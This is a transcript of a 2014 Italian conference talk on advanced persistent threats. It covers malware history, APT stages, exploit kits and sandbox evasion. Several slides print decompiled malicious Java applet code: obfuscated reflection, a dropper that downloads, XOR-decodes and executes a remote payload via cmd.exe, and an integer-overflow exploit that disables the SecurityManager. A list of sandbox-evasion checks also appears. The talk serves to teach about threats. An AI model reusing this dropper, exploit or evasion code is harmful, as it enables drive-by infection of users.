The magic world of APT 0.6 - Pompili

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROME 11-12.04.2014 www.codemotionworld.com

THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS

Andrea Pompili

There are only 10 types of people in the world:

Those who understand binary, and those who don't

[email protected]


Andrea Pompili



Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf


Andrea Pompili



Come si sviluppa un attacco?

<#1>

<#2>

<#3>


Andrea Pompili



<1996> The Dark Side of the Moon

http://vx.org.ua/29a/main.html


Andrea Pompili



rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines

<2000>

8,7 miliardi di dollari


Andrea Pompili



<2001> The Nimda Style

Microsoft IIS e PWS Extended Unicode Directory transversal Vulnerability

Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability

Microsoft IE MIME Header Attachment Execution Vulnerability TFTP Server

UDP:69

RICHED20.DLL

Microsoft Office 2000 DLL Execution Vulnerability

Microsoft IE MIME Header Attachment Execution Vulnerability

635 milioni di dollari


Andrea Pompili



SQL Server 2000 Desktop Engine

75.000 computer infettati in soli 10 minuti

payload di soli 376 byte (residente esclusivamente in memoria)



Andrea Pompili




DDOS contro www.sco.com

Upload&Execute 0x85 0x13 0x3c 0x9e 0xa2

Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html


Andrea Pompili



<2010-2012> Government in Action

> Stuxnet (2010)

> Duqu (2011)

> Flame (2012)

> Gauss (2012)

http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

Shopping For Zero-Days


Andrea Pompili



Il Malware più complesso della storia

> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)

> 80 domini utilizzati come sistemi di Comando e Controllo

> Diffusione via USB Stick (Infectmedia)

> Enumerazione dei dispositivi

Bluetooth (Beetlejuice)

> Registrazione audio (Microbe)

> Windows Update MITM (Munch & Gadget)

MD5 Collision Attack


Andrea Pompili



<2007> Storm Worm & CyberCrime Market

http://www.pcworld.com/article/138694/article.html


Andrea Pompili



http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/

« »


Andrea Pompili



Advanced Persistent Threats 101

> Trust Exploitation

Social Engineering Spear Phishing Botnet Drive-to-Click Strategy


Andrea Pompili




> Client Exploitation

Exploit Pack (e.g. Neutrino) 0-Day



Andrea Pompili





> Multi-Stage Shellcoding Dropper/Downloader Modules (e.g. RAT, Infostealer, etc.) Good Covert Channel



Andrea Pompili





> Multi-Stage

> Multi-Vector

Email Web Sites Botnet Physical (USB)



Andrea Pompili





> Multi-Stage

> Multi-Vector

> Resiliency

Camouflaging Command & Control Good Covert Channel



Andrea Pompili



Make or Buy?


Andrea Pompili



The Botnet Choice


Andrea Pompili



Drive-to-Click <#1>


Andrea Pompili



Drive-to-Click <#2>


Andrea Pompili



Drive-to-Click <#3>


Andrea Pompili



Drive-to-Click <#4>


Andrea Pompili



Drive-to-Click <#5>


Andrea Pompili



Trick#1> Giochiamo con le estensioni

RLO Unicode control character


Andrea Pompili



Trick#2> Content-Disposition Nightmare

http://www.gnucitizen.org/blog/content-disposition-hacking/

Download Server Response Headers

RFC 2616


Andrea Pompili



<applet codebase=“http://blahblah.evilsite.in/hiddenpath/"

archive=“http://blahblah.othersite.in/hiddenpath/

c8c34734f41cca863a972129369060d9” code=“rgmiv”>

Trick#3> Client Exploiting


Andrea Pompili



public class xp extends JApplet {

public void init() {

try {

Object aobj[] = new Object[0];

Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);

String s = "hpjwbludyi";

s = "wgpxrwyvzolbb";

s = "zdfmvftloqmakqysyu";

s = "nrrkqnjfylgtljyyferr";

cr.hzumfnc(obj);

Object aobj1[] = new Object[0];

String s1 = "ofvszonrzgelnko";

s1 = "fefhtspcqhj";

s1 = "evztavmzjarjgwu";

Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {

Integer.TYPE

}).newInstance(new Object[] {

Integer.valueOf(tcbteokd.mdrikbua(9))

});

int ai[] = new int[8];

Object aobj2[] = new Object[7];

aobj2[2] = cr.hzumfnc(obj);

...


Andrea Pompili



<01> XOR String Encryption

public static String ok = ha.n("1:-:u:,/u26:<>u\b:6+7>\0264?>7");

...

public static String n(String s) {

String s1 = "";

for (int i = 0; i < s.length(); i++)

s1 += idzfihff(s.charAt(i));

return s1;

}

...

public static char idzfihff(char c) {

return (char)(c ^ 0x5b);

}

https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

Malware


Andrea Pompili



<02> Java Reflection

public static Class fuss(String s) throws Exception {

return Class.forName(s);

}

...

public static Object dngfuv(Method method, Object obj, Object aobj[]) {

return method.invoke(obj, aobj);

}

public static Constructor bjixqh(Class class1, Class aclass[]) {

return class1.getConstructor(aclass);

}

...

https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf

Malware


Andrea Pompili



<03> ClassLoader Override

class t extends ClassLoader {

public static void ujrzjw(t t1, String s) {

try {

Class class1 = t1.defineClass("qbw",

tcbteokd.xcpoalaefqfvuacylvakyi, 0,

tcbteokd.xcpoalaefqfvuacylvakyi.length);

ygigtele.bjixqh(class1, new Class[] {

tcbteokd.fuss("java.lang.String")

}).newInstance(new Object[] { s });

} catch (Exception ex) {

System.exit(0);

}

}

}

Malware


Andrea Pompili



...

private static void lcsqyrgtbct (String s, int i) {

String s1 = s + Integer.valueOf(i);

...

rchannel= Channels.newChannel((new URL(s1)).openStream());

...

File file = File.createTempFile("~tmf", null);

FileOutputStream fos= new FileOutputStream(file);

for (int j = 0; j < abyte0.length; j++)

abyte0[j] = (byte)(abyte0[j] ^ 0x29);

fos.write(abyte0);

if (abyte0.length > 1024)

try {

Runtime.getRuntime().exec(new String[] {

"cmd.exe", "/C", file.getAbsolutePath()

});

} catch (IOException ioe) {

(new ProcessBuilder(new String[] {

file.getAbsolutePath()

})).start();

}

The Dropper Class


Andrea Pompili



Object obj1 = new java.awt.image.DataBufferByte(9);

int[] ai = new int[8];

Object[] oo = new Object[7];

oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);

...

DataBufferByte obj5 = new DataBufferByte(8);

for (int j = 0; j < 8; j++)

obj5.setElem(j, -1);

MultiPixelPackedSampleModel obj6 =

new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);

Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);

MultiPixelPackedSampleModel obj8 =

new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,

0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));

Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);

byte obj10 = new byte[] {0, -1}

IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);

CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);

obj12.compose(obj7, obj9, obj9);

The Malware Core

http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/


Andrea Pompili



The Cheaper Path to Exploiting Blackole Exploit Kit

http://en.wikipedia.org/wiki/Blackhole_exploit_kit

Styx Exploit Pack

http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto

Neutrino

http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

RedKit

http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html


Andrea Pompili



The InfoStealer Choice


Andrea Pompili



The RAT Choice


Andrea Pompili



Bitcoin + APT = Ransomware


Andrea Pompili



The Command&Control Choice <#1>


Andrea Pompili





Andrea Pompili



“The truth is, consumer-grade antivirus products can’t

protect against targeted malware created by well-

resourced nation-states with bulging budgets.

They can protect you against run-of-the-mill malware:

banking trojans, keystroke loggers and e-mail worms.

But targeted attacks like these go to great lengths to

avoid antivirus products on purpose”

Mikko Hypponen (F-Secure)

<2012> The Antivirus Maker Confession


Andrea Pompili



The Way to Sandboxing


Andrea Pompili



<01> USER-MODE AGENT

Software component in a guest operating system (keylogger) <02> KERNEL-MODE PATCHING

Guest operating system Kernel modified for tracing (rootkit) <03> VIRTUAL MACHINE MONITORING

Customized Hypervisor to monitor the guest operating system <04> SYSTEM EMULATION

Hardware emulator to hook appropriate memory, IO functions, peripherals, etc. <05> KERNEL EMULATION

Kernel emulator to hook appropriate system calls, etc.

The Way to Sandboxing


Andrea Pompili



Una lista (molto) parziale dei Player > Norman Sandbox (Norway 2001)

> FireEye (US 2004)

> Damballa (US 2006)

> Lastline/Anubis/Wepawet (Austria 2006)

> Sandboxie (2006)

> Cuckoo Sandbox (2010)

> VMRay formerly CWSandbox (Germany 2007)

> Joe Security LLC (Switzerland 2007)

> BitBlaze (2008)

> ThreatExpert (Ireland 2008)

> Ether (US 2009)


Andrea Pompili




Andrea Pompili



Una lista (completamente) parziale degli Evader


Andrea Pompili



Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012)

> MessageBox (Something that need to be clicked)

> Sleep Calls (Trojan Nap, uncovered in February 2013)

> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)

> Check Internet Connection

> Check Volume information and Size

> Check self Executable name

> Execution after reboot

> Check System services, files and communication ports


Andrea Pompili



Il limite delle Sandbox

Minuti

def: il Paziente Zero è il primo paziente individuato nel

campione della popolazione di un'indagine

epidemiologica…


Andrea Pompili



Sicuramente meglio che confidare negli utenti


Andrea Pompili



Domande? Italian

مطالب أيةArabic

¿Preguntas? Spanish

Questions? English

tupoQghachmey Klingon

Sindarin

Japanese

Ερωτήσεις? Greek

вопросы? Russian

The magic world of APT 0.6 - Pompili

Technology

Transcript of The magic world of APT 0.6 - Pompili